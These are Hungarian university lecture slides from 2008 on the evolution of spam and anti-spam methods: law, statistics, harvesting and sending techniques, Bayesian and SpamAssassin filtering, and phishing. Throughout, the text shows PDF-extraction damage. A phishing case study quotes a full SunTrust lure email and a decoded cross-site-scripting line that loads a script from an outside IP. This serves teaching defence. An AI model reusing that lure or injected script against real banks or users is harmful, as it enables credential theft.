The evolution of spam techniques and countermeasures

The evolution of spam techniques and countermeasures

Hámor Tamás Hellinger Péter Réti Kornél Révay Gergely Tutsek Bálint

Bevezető • SPAM: a fogadó által nem kért,

elektronikusan, például e-mailen keresztül tömegesen küldött hirdetés, felhívás.

• Az elnevezés eredete: Spiced Pork And Ham Egy angol konzervként forgalmazott hústermék, mely egy komikus filmjelenet (Monty Python Flying Circus egyik epizódja) alapján lett a „ránkerőltetett valami” jelölője. (Más elnevezések még: „shit posing as mail”, „stupid pointless annoying messages” …)

12/15/2008


2

Törvényi háttér • USA: – CAN-SPAM:

(2003 dec.) Első komolyabb lépés a törvényi szabályozásra, de komolyabb eredményeket nem érnek el vele („You can spam”)

– Jelenleg: Államonként eltérő, de többnyire elég szigorú. Pl.: Virginiában 25 000 dollár/nap, szövetségi szinten pedig 100 dollár/spam

• EU: – 2002: Az első átfogó spamtörvényt, de az Unión kívülről érkező kéretlen levelek ellen nem nyújt védelmet. Mégis az első európai kártérítési per csak 2006 elején (Nigel Roberts).

12/15/2008


3

Törvényi háttér • Magyarországon

(2008 szept. 1-től):

– A 2008. évi XLVIII. tv. (a gazdasági reklámtevékenység alapvető feltételeiről és egyes korlátairól) 6. § (1)-a alapján kéretlen elektronikus, üzletszerzést célzó reklámüzenet (azaz spam) csak természetes személynek nem küldhető előzetes beleegyezés nélkül. http://images4.wikia.nocookie.net/spam/hu/images/d/dc/ Legfobbszabalyok.pdf

12/15/2008


4

Motivációk, célok • Támadó (spammer): – Még az esetleges bűnetetések mellett is ez az egyik legolcsóbb, leghatákonyabb és legtöbbeket megcélzó módja a direkt marketing hirdetéseknek, reklámoknak, átveréseknek, adathalászatnak…

• Felhasználó, szolgáltató: – Minél kisebb tévedés mellett kiszűrni a kéretlen hirdetéseket!!!

12/15/2008


5

Legfrissebb statisztikai adatok • SPAM-ek aránya a 2008-as év első az e-mailek 92,3%-a volt spam, azaz tizenöt levélből csak egy nem kéretlen hirdetés. 2008 második negyedére ez az érték 77%-ra mérséklődött!!!

•

Küldött SPAM-ek száma éves és 100napos viszonylatban:

12/15/2008


6

Legfrissebb statisztikai adatok • … és hogy honnan jutottunk el idáig:

12/15/2008


7

Legfrissebb statisztikai adatok • Országos és domain statisztikák:

…élen az USA és a Yahoo 12/15/2008


8

Legfrissebb statisztikai adatok • Spamtípusok szerint:

18%-a hirdet valamiféle terméket 20% pénzügyi 17% egészségügyi tartalmú 4% kínál pornográfiát 2% politikai célú 1% phishing támadás

• „Legek” a SPAMvilágból: – – – –

Az első bizonyított és ismert táviratspamet 1904. szeptember 13-án küldték el. Legnagyobb kártérítés spamek miatt: 11,2 milliárd dollár Legnagyobb büntetés: 5,3 millió dollár + 300 000 dolláros perköltség (AOL - 2006 január) Legtöbb elküldött spam: 1012 billió kéretlen reklámlevél (Kim Ha-Na egy dél-koreai spammer álneve)

12/15/2008


9

Okozott károk

http://www.commtouch.com/site/Resources/calculator.asp

• • • • •

Letöltési/kiválogatási idő Tárhely Forgalom, sávszélesség Átverések …

12/15/2008


10

Mi ellen védekezzünk, a spam-melés folyamata • Címgyűjtés • A SPAM típusának és tartalmának kiválasztása/megtervezése • Célpont ( felhasználó, szerver) meghatározása • Küldés útjának megtervezése • Az okozható károk elkerülése (pl. phishing)

•

Minden egyes fázis ellen védekezhetünk…

12/15/2008


Nem E-Mail alapú SPAM Hámor Tamás

11

Kéretlen reklámok és üzenetek típusai E-Mail SMS Telefonhívás Fax Levél, prospektus (Direct Marketing) TV, DVD, Filmek Instant Messaging (MSN, Jabber, ICQ, IRC, stb.) Közösségi oldalak (iWiW, Facebook, Myspace, Hi5, stb.) Blogok, híroldalak, Wiki-k Street SPAM

SMS spam, spaSMS, mobilspam E-Mailhez hasonlóan opt-in, adatkezelési irányelvek (ügyfélszolgálat, kezelt adatok lekérdezhetőek, körük minimális, adatkezelés célja ismert) Adatgyűjtés: pl. hostess lányok, weboldalak Védekezés: Nem beregisztrálni, lemondani, NHH-nál vagy Fogyasztóvédelemnél panaszt tenni

Szia! Még nem ismerjük egymást, a barátnömtöl kaptam a számod. Uncsizom és dumcsiznék egyet! Ugye visszahívsz? Flóra és Heni. A számom: 0681****** Feladó: +36 30 *******

Telefon (telemarketing, direkt marketing) Gépi- vagy személyes megkeresés (Ön nyert!/ Ismeri új csomagunkat?) Opt-out: Robinson lista Adatgyűjtés: pl. telefonkönyv, hostess lányok, weboldalak Védekezés: Nem beregisztrálni, lemondani, NHH-nál vagy Fogyasztóvédelemnél panaszt tenni, Robinson lista

Faxspam, Junk fax A címzettnek is pénzbe kerül (papír, tinta) 2007. évi XCIV. tv. (Az elektronikus kereskedelemmel kapcsolatos egyes törvények módosításáról) tiltja

Postai küldemény (Direkt Marketing) Névre szóló Regisztráció, ügyfélszolgálat, adatvédelem, sorsjáték bejelentés Opt-out: Robinson lista Matrica a levelesládán: nem jelent semmit Címek központi lakcímnyilvántartásból, telefonkönyvből

TV, DVD, Filmek TV Magyarországon meghatározott műsoridőreklámidő arány Kábelszolgáltató saját reklámokat vág be

DVD Át nem ugorható reklámok

Filmek Több országban tilos a tudat alatti reklám (1-2 képkocka) Márkák a filmekben

Spim: Instant Messaging, Chat (1) Vírusok üzeneteket küldenek az áldozat nevében Phishing oldal elkéri a jelszavakat és úgy küld üzeneteket Az üzenetek tartalmazhatnak kártékony oldalakra mutató linket Kártékony programok közvetlenül is küldhetőek megtévesztő kiterjesztéssel Több IM szűri a linkeket (lásd MSN vs Youtube)

Spim: Instant Messaging, Chat (2) Chat spam: botok egy-egy üzenet erejéig belépnek szobákba (netes játékokban is) VoIP: hangüzenetek pl. Skype-on vagy játékokban (CS ☺)

Weboldalak, blogok Felugró ablakok (Warez, gyógyszer, pr0n) Villogó, mozgó Flash/GIF anim (Ön Nyert!) Megtévesztés (pl. ablaknak kinéző kép, lásd Phishing technikák) Böngészőablak átméretezése, mozgatása Vágólap SPAM Komment SPAM Meghívó SPAM Spamdexing

Social Networking Módszerek:

Üzenetekben: üzenőfal, vagy privát üzenet (pl. láncüzenetek) Hamis felhasználók Csoportok, fan oldalak Kisalkalmazások Meghívók Személyes adatok

Védekezés:

Értesítések tiltása Küldők tájékoztatása Kapcsolat megszakítása Blokkolás Jelentés Leiratkozás

Street SPAM Szórólapok Plakátok Stenclik, matricák

Az e-mail spamküldés egyes lépései és megakadályozásuk

Réti Kornél

Áttekintés A spamküldés folyamata ________________________________

Címgyűjtés

Megrendelés Üzenet összeállítása

Elküldés

Kézbesítés Hatás kifejtése

________________________________

12/15/2008


25

Címgyűjtés Módszerek: • Kereskedés vagy csere „kollégával” • Szótár alapú találgatás domain-en belül • Email-cím megadás kérése (cserébe ingyenes szolg.) • Vásárlás legitim szolgáltatótól • Gyűjtögetés robottal… Eredmény: • Címlista tartalmaz rossz, duplikátum, szerep, idegen címeket is • „Nem baj”, nincs plusz költség 12/15/2008


26

Címgyűjtés Gyűjtögetés – honnan: • Robotok: fórumokból, archívumokból } webről • Eleve publikált címeket

• Vírusok, kémprogramok: a merevlemezedről • Akár személyes, titkos címeket is

Védekezés: • Listamérgezés (list poisoning) • Kapcsolatfelvételi űrlap (contact form) • Címferdítés (address munging)

• Utasításokkal… gond: buta emberek, okos robotok • Átlátszóan… gond lehet: felolvasóprogramok, szöveges böngészők

12/15/2008


27

Címgyűjtés Élő címek ellenőrzése: • „Web bug” a HTML levelekben • „Leiratkozás” link Védekezés: • HTML kikapcsolása :-/ • Internetes URL-ek követésének kikapcsolása • Ne kattints rá!

12/15/2008


28

Elküldés Forrásgép • Saját, rejtve (álfejléccel, proxyval) • Internet café • Botnet Forráscím • Autogenerált webmail címek • Nem létező, hamis címek (open relay) • Mások email címei (vírusok)

12/15/2008


29

Elküldés Open Relay SMTP szerverek • Bárki küldhet, bármilyen címről… jaj! • Hosszú BCC lista volt (már egyedi emailek) Megoldási kísérletek • POP before SMTP • Átlátszó, de bizonytalan

• SMTP-AUTH • Nem véd a hamisítás ellen. Gyenge pont a user password

• ISP smart host-ok • Kábel/DSL tiltása, szigorú RFC formátum 12/15/2008


30

Elküldés Továbbított spam kivédése • Greylisting, nolisting } szigorú RFC • DNSBL technológia – DNS alapon lekérdezhető IP feketelista – Létezik URI-lista is – Alkalmazások:

• MAPS RBL • ORBS • SPEWS, APEWS 12/15/2008


31

Spam trap • Honeypot spam ellen • Weben csapda email címek publikálása – Ember számára nem látható – Robot földolgozza – Csak spam jön rá!

• Érkező spam elemzése – Tartalom analizálása – Hasonló levelek blokkolása – Forráscím feketelistára tétele

• Ha lebukik, kihasználható 12/15/2008


32

Összegzés • Nincs általános megoldás, csak részproblémákra megoldások • Szereplők: Email küldők, email várók, email szolgáltatók, egyéb (DNS, ISP, fejlesztők,…) • Mindenkinek tenni kell a saját részéről • Fejlődő védelem, fejlődő spam • Nemcsak műszaki vonatkozások, de mérnöki megoldásokat igényel

12/15/2008


Tartalom alapú SPAMszűrés Hellinger Péter 2008. december 11.

33

Bevezető Feltételezés: lehetséges a megkülönböztetés – nem triviá triviális: tö tömeges levelet tartalom alapjá alapján? – mégis: egyetlen megkerü megkerülhetetlen vé védekezé dekezés?

Támadó és védekezési módszerek fejlődése – eredmé eredménye: tö több szintű szintű, összetett szű szűrők

A fals pozitív sokkal rosszabb – ennek megfelelő megfelelően mű működnek a szű szűrők

2008.12.11.

Tartalom alapú alapú spamszű spamszűrés

35

Kezdeti szűrők és a DCC Kezdetek – kézzel kó kódolt egyszerű egyszerű szabá szabályok pl. tartalmaz egy kifejezé kifejezést „Call Now!!!” Now!!!”, akkor spam

Spam – ugyanaz az üzenet sokszorosítva – fingerprint (hash érté rték) szerint eldobá eldobás – spammer vá változó ltozó részeket ad az üzenetekhez exp. szá számú signature kellene

Distributed Checksum Clearinghouses (DCC) – DCC szerver és kliens – kis (UDP) forgalmat generá generál – fuzzy checksums, üzenet bizonyos ré részeit ignorá ignorálja 2008.12.11.


36

Heurisztikus/genetikus szűrők Empirikus szabályok Több szabály tüzelése alapján lesz spamnek nyílvánítva az üzenet – komplex szabá szabályok

Nagyobb erőforrás-igény, mint a statisztikai szűrők

2008.12.11.


37

Bayes szűrés (1) Bayes – supervised machine learning – spamspam-ham jellegzetessé jellegzetességek megtanulá megtanulása

Bayes formula

2008.12.11.


38

Bayes szűrés (2) Legyen

attribú attribútumvektor,

Naiv Bayes szű szűrés (fü (függetlensé ggetlenség):

, 2008.12.11.

– relatí relatív gyakorisá gyakoriságokbó gokból Tartalom alapú alapú spamszű spamszűrés

39

Bayes szűrés (3) Fals pozití pozitív legyen

-szor olyan rossz!

– akkor nyilvá nyilvánítjuk spamnek, ha:

lehet aká akár 999, ha a spamet automatikusan tö töröljü ljük.

2008.12.11.


40

Bayes szűrés (4) Tanítás

– nagy spam és ham adathalmaz – tokenizá tokenizálás – való valószí színűségek:

Működés

– tokenizá tokenizálás

fejlé fejléc, HTML, Javascript is figyelmen kí kívül hagyni:

– HTML comment és csak szá szám token – taní tanító halmazban 55-nél kevesebbszer szereplő szereplő token

– érdekes tokenek: 0.5 való valószí színűségtő gtől tá távol 2008.12.11.


41

Második generációs Bayes szűrők Fejlesztés – preprocessing pl. helyettesí helyettesítő karakterek (‘ (‘@’, ‘$’, ‘1’...)

– tokenizá tokenizálás, token kombiná kombináció ció token: regulá reguláris kifejezé kifejezésnek megfelel token nn-esek, pl. max 5 mé méretű retű ablak: w4 w5 w3 <skip> w5 w2 <skip> <skip> w5 w1 <skip> <skip> <skip> w5

token sú súlyozá lyozás

–… 2008.12.11.


42

További szűrő módszerek Egyéb osztályozó algoritmusok, modellek – dönté ntési fá fák, SVM, Boosting

Linkek (URL) alapján (elsősorban) – Emerald Spam Shield – – – –

spamek 95%95%-a tartalmaz linket levé levél a CyberPatrol há hálózatá zatára érkezik sajá saját listá listájuk van a tá támadó madó weboldalakró weboldalakról ismeretlen URL eseté esetén webbot felderí felderíti (veszé (veszélyes tartalom, redirecting...)

Kombinált megoldások 2008.12.11.


43

SpamAssassin OpenOpen-source Kb. ezer teszt alapjá alapján pontoz Score érté rtékek tanulá tanulása – kb. 1 millió millió kézzel vá válogatott levé levél alapjá alapján – gépi tanulá tanulás (genetikus algoritmus, neurá neurális há háló) – negatí negatív score is

Mié Miért kell score? – statisztikai szű szűrők folyamatosan taní tanítani kell spammerek új mó módszerekkel pró próbáljá lják kikerü kikerülni

Sok technika kombiná kombinálva – kombiná kombinált score nagyon nehezen megté megtéveszthető veszthető 2008.12.11.


44

SpamAssassin tests Néhány teszt pé példa Default Scores (local, net, with bayes, with bayes+net)

<5: ham 5-12: spamgyanú spamgyanús >12: spam 2008.12.11.


45

Image SPAM 20062006-ban nagyon megugrott az ará arányuk Kép helye alapjá alapján letö letölté ltés kü külső lső forrá forrásbó sból – e-mail cí cím lé létezik! attachment

Szö Szöveg felismeré felismerése a ké képben – OCR (Optimal Character Recognition) megté megtéveszté vesztése

Randomizá Randomizáló techniká technikákkal egyedi ké képek lé létrehozá trehozása – signature ellen

Alap megoldá megoldások Fehé Fehér lista 2008.12.11.


46

2008.12.11.


47

2008.12.11.


48

Image SPAM – új módszerek Néhány példa image spam szűrésre – Conference of E-mail and Anti-Spam (CEAS) 2007 & 2008 – – –

OCR mó módszereket megté megtévesztő vesztő techniká technikák detektá detektálása NearNear-Duplicate Detection Gyors ké kép osztá osztályozó lyozók jó jellemző jellemzők (feature) haszná használata Just In Time (JIT) feature extraction

2008.12.11.


49

Összegzés Who-Where-What-How szűrési elv: Who sent the message and what do we know about this sender? Where does the call to action in the message take you? What is the nature of the message content? How was the message technically constructed?

2008.12.11.


50

Phishing

Készítette: Révay Gergely

Előadás menete

• Phishing típusok • 2008 Q1 statisztika • Best Practices • Esettanulmány

Phishing típusok

•

Phishing: Személyes információ megszerzése egyenesen a végfelhasználótól az Interneten keresztül. Nagy részben 'Social Engineering'. Esetünkben főleg nagymennyiségben kiküldött e-mail-ekkel és hamis honlapokkal.

•

Pharming: Technológiailag fejlettebb és szofisztikáltabb megoldás, már nem a felhasználó figyelmetlenségében bízik, hanem valóban eltéríti a valós URL-t.(hosts fájl átírás, DNS cache poisoning stb..)‫‏‬

•

Whaling: Ha igazán 'Nagy Halat' akarunk. Nem nagymennyiségben kiküldött e-mail-ekkel, hanem célzott és sokkal jobban megtervezett támadás főleg vezetők ellen.

2008 Q1 statisztika

Január Február Március Egyedi phishing bejelentések száma

29284

30716

25630

Egyedi phishing oldal

20305

36002

24908

131

139

141

US

US

US

Támadott védjegyek száma Legnépszerűbb phishing oldalakat hosztoló ország Valamilyen formában szerepel benne URL

28.30% 23.20% 26.10%

Nincs hosztnév, csak IP

5.50% 13.20% 4.00%

Nem a 80-as portot használja

0.81%

Legtovább futó honlap

31 nap 29 nap 31 nap

0.45%

0.49%

Best Practices -1

1. Inbound szűrés Az eddigi spamszűrő technikák(Bayes-szűrés, white/blacklist, URL szűrés) nem nagyon hatékonyak mert az e-mail általában valós e-mail-ek másolata, a honlap pedig több szempontból dinamikusan változik. 2. Üzenetek eldobása Ha az üzenet phishing része akkor ne kerüljön a felhasználó elé. 3. Felhasználó oldali védelem Az ISP ösztönözze a felhasználót a védekezésre. 4. Küldő hitelesítés Az ISP próbálja ellenőrizni a küldőt, amennyiben nem sikerül utasítsa vissza a levelet.

Best Practices - 2

5. Képek elrejtése Amíg a felhasználó nem kéri ne mutassuk a képeket a levélben. 6. Hyperlink-ek elrejtése/törlése Így nem csábítja a a felhasználót azonnali klikkelésre. 7. DNS infrastruktúra frissítése Pharming ellen fontos, hogy a hibákat gyorsan javítsák. 8 Tanusítványok használata Csak tanusítvánnyal rendelkező oldalakban bízzunk(de azokban sem feltétlenül).

Phishing Phil http://cups.cs.cmu.edu/antiphishing_phil/

Esettanulmány

• 2004 november 29-én elfogott levél • A Suntrust Bank ügyfeleit támadja • A NewScientist.com jelentette a támadást decemberben • Különlegessége, hogy több mint 10 technikát használ ebben az egy levélben

Esettanulmány – 1 Return-Path: Delivered-To: victim-example:[email protected] X-Envelope-To: [email protected] Received: (qmail 75674 invoked from network); 29 Nov 2004 06:16:27 -0000 Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75)‫‏‬ by smtp.example.com with SMTP; 29 Nov 2004 06:16:27 -0000 X-Message-Info: MU/s+631+rx/BKO+3/216645278374332 Received: from [email protected] ([82.67.84.75]) by [email protected] with Microsoft SMTPSVC(5.0.4416.5263); Tue, 30 Nov 2004 07:12:03 -0100 Received: from [email protected] ([email protected] [82.67.84.75])‫‏‬ by [email protected] (Postfix) with SMTP id 185GNY98L9KAW for ; Tue, 30 Nov 2004 02:08:03 -0600 Received: from [email protected] ([82.67.84.75]) by [email protected] with Microsoft SMTPSVC(5.0.1957.3440); Tue, 30 Nov 2004 09:16:03 +0100 X-Message-Info: HMRMU+%ND_LC_CHAR[1-3]97+s+KGV+217/8250521976135 Received: from [email protected] ([58.196.169.62]) by [email protected] with MailEnable ESMTP; Tue, 30 Nov 2004 06:13:03 -0200 Date: Tue, 30 Nov 2004 01:11:03 -0700 Message-Id: <8113167202.92300@[email protected]> From: Suntrust Billing Department To: victim Subject: Failure to confirm your records may result in your account suspension. MIME-Version: 1.0 (produced by zombieatrophic 7.4)‫‏‬ Content-Type: multipart/alternative; boundary="--1587620319582573" X-Spam-Filtered: 1a8847654ec47980fc0f6a3aa0000d3f X-Spam-Status: No, hits=1.1 required=3.5 tests=MIME_HTML_ONLY,BAYES_01,HTTP_EXCESSIVE_ESCAPES,HTML_50_60,HTML_LINK_CLICK_HERE,MIME _HTML_ONLY_MULTI,CLICK_BELOW,HTML_IMAGE_ONLY_10,HTML_MESSAGE X-Spam-Flag: NO X-Spam-Level: * ----1587620319582573

Esettanulmány – 2 Content-Type: text/html; charset="iso-8701-7" Content-Transfer-Encoding: quoted-printable Content-Description: habit hysteria contemptuous

Dear valued Suntrust m= ember,

Due to concerns, for the safety and integrity of the online banking commun= ity we have issued the following warning message.

It has come to our attention that your account information needs to be con= firmed due to inactive customers, fraud and spoof reports. If you could please ta= ke 5-10 minutes out of your online experience and renew your records you will= not run into any future problems with the online service. However, failure to = confirm your records may result in your account suspension.

Once you have confirmed your account records your internet banking service= will not be interrupted and will continue as normal.

Esettanulmány – 3

Please click here to confirm you= r bank account records.

Thank you for your time,
Suntrust Billing Department.

Esettanulmány - 4

Suntrust Privacy Promise
Terms, conditions, caveats and small print
<nobr>=A9 2004 SunTrust Banks, Inc. - Equal Housing Lender - Member FDIC

----1587620319582573--


•

Return-Path: [email protected]

Hamisított From címből készíti az utolsó SMTP szerver, ez az alap trükk. •

Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75)

Valódi az utolsó SMTP szerver, itt egy francia ISP felhasználója, valószínűleg egy feltört otthoni gép. •

Received: from [email protected] ([82.67.84.75]) by [email protected] with Microsoft SMTPSVC(5.0.4416.5263);

Hamis Received header, ha több van növeli a bizalmat, de mivel @ van a hoszt névben ezért egyértelműen hamis. Ehhez még jönnek a random fehérlistás szavak.


•

Tue, 30 Nov 2004 07:12:03 -0100

•

From: Suntrust Billing Department

•

To: victim

Hamis dátum, a jövőben van. Valószínüleg elcsúszott otthoni gép órája okozza. Ugyanezt láthatjuk a Return-path-ban is. De elképzelhető, hogy létezik a cím és az osztály. Megszemélyesített címzett. A szándék megvolt a megszemélyesítésre, de ilyenkor általában csak a @ előtti részt másolják át, ami nem mindig adja ki az elvárt “[Vezetéknév] [Keresztnév]” párt.

Esettanulmány - 7

•

Subject: Failure to confirm your records may result in your account suspension.

Tipikus a phishing-re a negatív motivátor “baj lesz ha nem csinálod”, a spammel ellentétben ahol általában pozitív motivátor van “nagyobb lehet ha megveszed”.

•

Content-Type: text/html;

•

Content-Description: habit hysteria contemptuous

Ebben a levélben csak html volt. Jobb helyeken már csatolják ugyanazt plain text-ben is, a kompatibilitás kedvéért. Ismét véletlen 'jó' szavak a Bayes szűrők megtévesztésére.


•

•

font face=3D"Trebuchet MS">Dear valued Suntrust m= ember,

Valós képek egyenesen a cég honlapjáról.

Személytelen megszólítás. Ha a valódi bank írna meg tudná oldani, hogy névre szóljon a levél.

•

Due to concerns, for the safety and integrity of the online banking commun=ity we have issued the following warning message.

Fura nyelvtan. Két oka lehet: nem anyanyelvű író, spam szűrő megtévesztése. Az utóbbi érdekében ismert kifejezéseket cserélnek le szinonimákra, itt “online banking community” = “your account”.


click here to confirm you= r bank account records.

Ez három fontos elemet hordoz magában. 1. ScreenTip:
href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=d f4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&pro mo=

Esettanulmány – 10 3. Szkriptelés • Hex kódolt HTTP praméterekből dekódolt szkript: <SCRIPT language=javascript src="http://218.103.23.138:8081/sun/sun.js".

• Sajnos a szervert elég gyorsan lekapcsolták ezért nem derült ki mit csinál pontosan a sun.js. • A Suntrust számla ellenőrző oldalának volt egy CrossSite Scripting hibája. • A támadó valószínűleg ezt használta ki, hogy megváltoztassa az oldalukat olyanra, hogy onnan meg tudja szerezni a felhsználó adatait.

Összefoglalás

• Kifejezetten aktív műfaj napjainkban • Nehéz ellene védekezni • Több mint Social Engineering • Már komoly technikai háttere van

Köszönöm a figyelmet!

Kérdések?

The evolution of spam techniques and countermeasures

Recommend Documents